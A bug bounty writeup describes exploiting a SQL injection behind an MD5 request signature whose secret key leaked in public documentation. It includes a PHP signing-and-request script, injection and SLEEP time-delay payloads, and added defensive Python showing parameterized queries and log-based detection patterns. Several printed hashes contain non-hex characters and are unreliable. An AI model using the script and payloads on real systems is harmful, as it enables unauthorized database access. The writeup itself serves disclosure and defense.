[Bug Bounty Writeups] Exploiting SQL Injection Vulnerability

Ahmed ElTijani
Published in SUDOROOT
3 min read · Apr 30, 2020

I’m going to share this concise writeup for a bug reported to one of the bug bounty programs on HackerOne.

The bug was very straightforward, but there was an obstacle that could have prevented it from being discovered:
the problem was that you need to provide a valid signature for each request you submit. 😲

Let’s say the endpoint looks like this:

http://site.com/vuln.php?param=1&sig=MD5_HASH

The backend server first validates the request to see whether a valid signature is provided, then continues and processes the request.
So, if we need to test that endpoint, we first need to know how signatures are calculated.
For this purpose I took a look at the developers’ documentation. I was very lucky that I found the SecretKey used in the generation of the MD5 signature leaked in that documentation. 🥳

How signatures are calculated:

signature = md5 ( params_value + SecretKey )

The signature is the md5sum of all parameter values concatenated with the SecretKey.

Let’s say the SecretKey was “AABBCCDDEEFFGG”.

That means, if we need a request like this:

vuln.php?param=1111"

then the signature must be:

md5 ( 1111" + AABBCCDDEEFFGG)
= md5(1111"AABBCCDDEEFFGG)
= d2d0114df70a4485a8d836efa018b28d

The final request looks like:

https://site.com/vuln.php?param=1111"&sig=d2d0114df70a4485a8d836efa018b28d

The above request triggered a SQL error 😎
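To make the security point concrete, here is an added Python example (not code from the writeup or from the target program) that models the scheme described above: the server checks md5(param_value + SecretKey) and only then uses the parameter in a query. The key value and the table rows are constructed for the demo, an in-memory SQLite table stands in for the MySQL backend, and the vulnerable query uses single-quoted string literals because SQLite reserves double quotes for identifiers; the logic is otherwise the same as the double-quote case in the writeup. Once the key is known, a correctly signed payload passes validation and still changes the query, while the parameterized version treats the same signed value as plain data.

```python
import hashlib
import hmac
import sqlite3

# Constructed for this demonstration: the key value and the md5(value + key)
# scheme follow the writeup's description; the table rows are made up.
SECRET_KEY = "AABBCCDDEEFFGG"


def sign(param_value: str) -> str:
    """Signature as the writeup describes it: md5(param_value + SecretKey),
    computed over the raw (not URL-encoded) parameter value."""
    return hashlib.md5((param_value + SECRET_KEY).encode()).hexdigest()


def signature_is_valid(param_value: str, sig: str) -> bool:
    # Constant-time compare. Note what this proves: the sender knew SecretKey.
    # It says nothing about whether param_value is safe to put in a query.
    return hmac.compare_digest(sign(param_value), sig)


def make_db() -> sqlite3.Connection:
    """In-memory SQLite stand-in for the MySQL backend, with sample rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE items (id INTEGER PRIMARY KEY, name TEXT)")
    conn.executemany("INSERT INTO items VALUES (?, ?)",
                     [(1, "alpha"), (2, "beta"), (3, "gamma")])
    return conn


def vulnerable_lookup(conn: sqlite3.Connection, param_value: str, sig: str):
    """Checks the signature, then concatenates the value into the SQL text:
    the pattern behind the writeup's finding."""
    if not signature_is_valid(param_value, sig):
        return None  # rejected before reaching the database
    query = "SELECT name FROM items WHERE id = '%s'" % param_value
    return [row[0] for row in conn.execute(query)]


def hardened_lookup(conn: sqlite3.Connection, param_value: str, sig: str):
    """Same signature check, but the value is bound as a parameter, so it is
    only ever compared as data and never changes the query structure."""
    if not signature_is_valid(param_value, sig):
        return None
    return [row[0] for row in conn.execute(
        "SELECT name FROM items WHERE id = ?", (param_value,))]


if __name__ == "__main__":
    conn = make_db()
    payload = "1' OR '1'='1"   # signed correctly, because the key is known
    sig = sign(payload)
    print("vulnerable:", vulnerable_lookup(conn, payload, sig))  # all rows
    print("hardened:  ", hardened_lookup(conn, payload, sig))    # no rows
```

The signature check answers "who sent this request?", not "is this value safe?"; the two controls are independent, and the only one that stops the injection is binding the value as a query parameter. Keeping the key out of public documentation and using an HMAC instead of a bare hash-of-concatenation are separate improvements to the authentication part.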

🥺🥺🥺🥺🥺🥺🥺

I was asked by the team to dig deeper into exploiting this vulnerability and to provide a PoC that results in a 10-second delay in the server response 🤐

For that purpose I had to try several queries, so I wrote this very simple PHP script to save the time that would be spent on signature generation:

<?php
// Usage: php exp.php '<param value>'
// The signature is md5(value + SecretKey) over the raw value (see the worked
// example above), so hash first and URL-encode only when building the request.
$value = $argv[1];
$SecretKey = "AABBCCDDEEFFGG";
$sig = md5($value . $SecretKey);
$req = "http://site.com/vuln.php?param=" . urlencode($value) . "&sig=" . $sig;
echo $req . "\n";             // print the signed request, then the response
echo file_get_contents($req);
?>

Running the script from the terminal:

$ php exp.php '1"'

http://site.com/vuln.php?param=1"&sig=5a8xd71839d8073218e5761025791d2c

gives → MySQL Error 🧐

$ php exp.php '1" ORDER BY 1 -- +-'

http://site.com/vuln.php?param=1+ORDER+BY+1--%2B-&sig=f8b8cb839d8j33218odi610sq2791d2c
... etc.

$ php exp.php '1" UNION SELECT 1,SLEEP(10),3 -- +-'

http://site.com/vuln.php?param=1+UNION+SELECT+1%2CSLEEP%2810%29%2C3--%2B-&sig=32a097a82139a371bcb6839e0aa103e8
got a 10-second delay 😁.

😪😪😪😪

It was a double-quote injection. Automated tools will not work in this case since they have no idea about the signature (you can write your own tamper script for sqlmap to automate it).
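From the defender's side, the requests in this writeup are easy to spot once the query string is decoded, signature or not. The following added Python script (not part of the original post) scans constructed access-log lines modelled on the URLs above; the client address, timestamps and `sig` values are made up, and the patterns are deliberately narrow indicators for the request shapes shown here rather than a general SQL injection signature.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Constructed access-log lines modelled on the writeup's requests. The client
# address, timestamps and SIGVALUE placeholders are made up; the param values
# are the URL-encoded forms of the probes shown above.
SAMPLE_LOG = """\
203.0.113.7 - - [30/Apr/2020:10:00:01 +0000] "GET /vuln.php?param=1&sig=SIGVALUE HTTP/1.1" 200 512
203.0.113.7 - - [30/Apr/2020:10:00:05 +0000] "GET /vuln.php?param=1%22&sig=SIGVALUE HTTP/1.1" 500 97
203.0.113.7 - - [30/Apr/2020:10:00:09 +0000] "GET /vuln.php?param=1%22+ORDER+BY+1--%2B-&sig=SIGVALUE HTTP/1.1" 200 512
203.0.113.7 - - [30/Apr/2020:10:00:30 +0000] "GET /vuln.php?param=1%22+UNION+SELECT+1%2CSLEEP%2810%29%2C3--%2B-&sig=SIGVALUE HTTP/1.1" 200 512
"""

# Indicator patterns, applied to the *decoded* parameter value. A hit means
# "look at this request", not "this is confirmed malicious".
INDICATORS = {
    "union_select": re.compile(r"\bunion\b\s+(?:all\s+)?select\b", re.I),
    "time_delay": re.compile(r"\b(?:sleep|benchmark|pg_sleep|waitfor)\b\s*\(?", re.I),
    "order_by_probe": re.compile(r"\border\s+by\s+\d+", re.I),
    "sql_comment": re.compile(r"--|/\*"),
}

# Apache/nginx combined-log request line: method, path+query, status code.
LOG_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+" (\d{3})')


def quotes_unbalanced(value: str) -> bool:
    """An odd number of quote characters is the classic first sign of a probe
    like the 1" request that produced the MySQL error in the writeup."""
    return value.count("'") % 2 == 1 or value.count('"') % 2 == 1


def analyze_value(value: str) -> list:
    """Return the names of all indicators that fire on one decoded value."""
    hits = [name for name, rx in INDICATORS.items() if rx.search(value)]
    if quotes_unbalanced(value):
        hits.append("unbalanced_quote")
    return hits


def scan_log(text: str) -> list:
    """Decode every query parameter of every request line (parse_qs undoes
    both %XX escapes and '+' for space) and report the ones with indicators."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        m = LOG_RE.search(line)
        if not m:
            continue
        path, status = m.group(1), int(m.group(2))
        params = parse_qs(urlsplit(path).query, keep_blank_values=True)
        for name, values in params.items():
            if name == "sig":  # opaque hash; scanning it only adds noise
                continue
            for value in values:
                hits = analyze_value(value)
                if hits:
                    findings.append({"line": lineno, "param": name, "value": value,
                                     "indicators": hits, "status": status})
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print("line %d param=%s status=%d %s  %r"
              % (f["line"], f["param"], f["status"], ",".join(f["indicators"]), f["value"]))
```

Because the scan works on the decoded value rather than the raw URL, `%22`, `+` and `%2C` do not hide anything, and the `sig` parameter is ignored entirely: a valid signature proves the sender held the key, which from a monitoring standpoint makes a flagged request more interesting, not less. The 500 on the bare-quote probe followed by a slow, signed `SLEEP(10)` request from the same client is the sequence worth alerting on.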

The bug was submitted to the program; it had a CVSS score of 10/10 and was classified as Critical. The program paid $2000 for this bug, which was the maximum payout the program could pay at that time.

Cheers 🥂

./S3cr3tSDN
